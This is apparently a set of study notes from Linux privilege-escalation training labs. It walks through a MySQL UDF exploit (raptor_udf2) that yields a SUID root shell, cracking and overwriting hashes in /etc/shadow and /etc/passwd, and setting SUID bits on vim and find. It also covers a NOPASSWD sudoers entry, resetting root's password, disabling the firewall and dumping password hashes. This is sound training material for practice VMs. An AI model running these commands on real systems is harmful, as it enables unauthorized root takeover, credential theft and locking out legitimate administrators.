Linux PrivEsc

Linux Privilege Escalation

Service Exploits

The MySQL service is running as root and the "root" user for the service does not have a password assigned. We can use a popular exploit that takes advantage of User Defined Functions (UDFs) to run system commands as root via the MySQL service.

exploiting MySQL

Change into the /home/user/tools/mysql-udf directory:

cd /home/user/tools/mysql-udf

Compile the raptor_udf2.c exploit code using the following commands:

gcc -g -c raptor_udf2.c -fPIC gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Connect to the MySQL service as the root user with a blank password:

mysql -u root

Execute the following commands on the MySQL shell to create a User Defined Function (UDF) "do_system" using our compiled exploit:

use mysql; create table foo(line blob); insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so')); select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; create function do_system returns integer soname 'raptor_udf2.so';

Use the function to copy /bin/bash to /tmp/rootbash and set the SUID permission:

select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');

Exit out of the MySQL shell (type exit or \q and press Enter) and run the /tmp/rootbash executable with -p to gain a shell running with root privileges:

/tmp/rootbash -p

Remember to remove the /tmp/rootbash executable and exit out of the root shell before continuing as you will create this file again later in the room!

rm /tmp/rootbash exit

Weak File Permissions

- Readable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user.

Note that the /etc/shadow file on the VM is world-readable:

ls -l /etc/shadow

View the contents of the /etc/shadow file:

cat /etc/shadow

Each line of the file represents a user. A user's password hash (if they have one) can be found between the first and second colons (:) of each line.

Save the root user's hash to a file called hash.txt on your Kali VM and use john the ripper to crack it. You may have to unzip /usr/share/wordlists/rockyou.txt.gz first and run the command using sudo depending on your version of Kali:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Switch to the root user, using the cracked password:

su root

Remember to exit out of the root shell before continuing!

Weak File Permissions - Writable /etc/shadow

The /etc/shadow file contains user password hashes and is usually readable only by the root user.

Note that the /etc/shadow file on the VM is world-writable:

ls -l /etc/shadow

Generate a new password hash with a password of your choice:

mkpasswd -m sha-512 newpasswordhere

Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.

Switch to the root user, using the new password:

su root

Remember to exit out of the root shell before continuing!

Weak File Permissions - Writable /etc/passwd

The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Note that the /etc/passwd file is world-writable:

ls -l /etc/passwd

Generate a new password hash with a password of your choice:

openssl passwd newpasswordhere

Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x").

Switch to the root user, using the new password:su root

Alternatively, copy the root user's row and append it to the bottom of the file, changing the first instance of the word "root" to "newroot" and placing the generated password hash between the first and second colon (replacing the "x").

Now switch to the newroot user, using the new password:

su newroot

Remember to exit out of the root shell before continuing!

Lab:

Understand the scenario

You are responsible for ensuring that server configurations for your organization are secure. You believe one of the servers has been configured in a way that grants administrative privileges to programs that could be exploited. First, you will deliberately configure the Vim text editor in a way that will allow security breaches, and then you will test to see how this configuration can be exploited. Next, you will use elevated privileges to reset the password of the root user, restart a service, disable the firewall, and access password hashes. Finally, you will grant administrative privileges to the find command, and then you will exploit the administrative privileges by running commands as the root user, and then accessing password hashes.

Understand your environment

You will use a default installation of CentOS 7 Linux with the Server with GUI package installed. Non-privileged accounts have been created for you. You will be guided through the process of adding software if necessary

  • Open the Terminal, and then run the following command to find programs that execute with administrative privileges: find / -perm -u=s -type f 2>/dev/null

    • Run the following command to attempt to view the /etc/shadow file: cat /etc/shadow

      The /etc/shadow file is the storage location for the encrypted user account passwords. By default, only the system administrator can view the file contents. You should receive an access denied message because you are currently sign in using an account that does not have administrative privileges.

    • Run the following command to switch to the root user account, and then when prompted, enter P@ssw0rd123 as the password: su - root

    • Run the following commands to configure Vim to run with administrative privileges: chmod u+s /usr/bin/vim chmod u+s /bin/vim

    • Enter exit to return to the user01 account.

    • Run the following command to find programs that run with administrative privileges, and to include a search for Vim: find / -perm -u=s -type f 2>/dev/null | grep vim

  • Run the following command to open the /etc/sudoers file by using the Vim text editor: vim /etc/sudoers

    This file allows for the delegation of administrative privileges. The entry you will make now delegates access to all commands on the system, as if you were the system administrator (root user).

  • Press Shift G to move to the end of the file, and then press i to enter Insert mode in Vim.

  • At the end of the file, on a new line, enter the following text: %user01 ALL=(ALL) NOPASSWD:ALL

    You must delete the # that is automatically placed at the start of each line!

  • Press Esc.

  • Enter the following command to force Vim to save the changes, and then exit Vim: :wq!

    You have now delegated all system administrator privileges to the user01 account. This exploits the security vulnerability you created when you configured Vim in the first activity, granting it the ability to run with the system administrator credentials

Use elevated privileges to take control of a server

  • Run the following command to reset the password: sudo passwd root

  • When prompted, enter password as the new password. You will be prompted to enter the new password twice. Result

    This action will lock the legitimate system administrator out of the server.

  • Run the following command to restart the sshd service: sudo systemctl restart sshd

  • Run the following commands to stop, and then disable the firewall: Result sudo systemctl stop firewalld sudo systemctl disable firewalld

  • Run the following command to view the encrypted passwords stored in the /etc/shadow file: Result sudo cat /etc/shadow

    This would allow you to copy the encrypted passwords into a password cracking program like John the Ripper.

    The examples in this task are very basic examples of malicious activities that might occur on a vulnerable system.

  • Run the following commands to access a command prompt that has root privileges: Result vim file.txt :set shell=/bin/bash :shell

    Any command run at this command prompt runs with the root user's authority.

  • Enter exit, and then in Vim, press :q! and Enter to return to the user01 account.

    Vim provides this warning to indicate you have attempted to edit a read-only file. The :q! command quits Vim without saving changes to the file, and you must press Enter to confirm.

Create a security vulnerability by configuring the find command

  • un the following command to get root privileges, and then when prompted, enter password as the password: su - root

  • Run the following command to configure the find command to run using administrative privileges: Result chmod u+s /bin/find

    This configuration creates a security vulnerability that will allow you to run the find command with the root administrator privileges. The find command can run a command after the search completes. In this case, that command executes using root privileges.

  • Enter exit to switch back to the user01 account.

  • Run the following command to create an empty file named file.txt: touch file.txt

  • Run the following command to verify that you have root privileges: Result find file.txt -exec whoami \;

  • Run the following command to exploit the encrypted passwords on the system: Result find /etc/shadow -exec cat /etc/shadow \;

    Observe the encrypted passwords in the /etc/shadow file. This technique would allow you to copy the encrypted passwords into a password cracking program like John the Ripper.

Sudo

- Shell Escape Sequences

Í

PreviousUser ManagementNextPackage Management

Last updated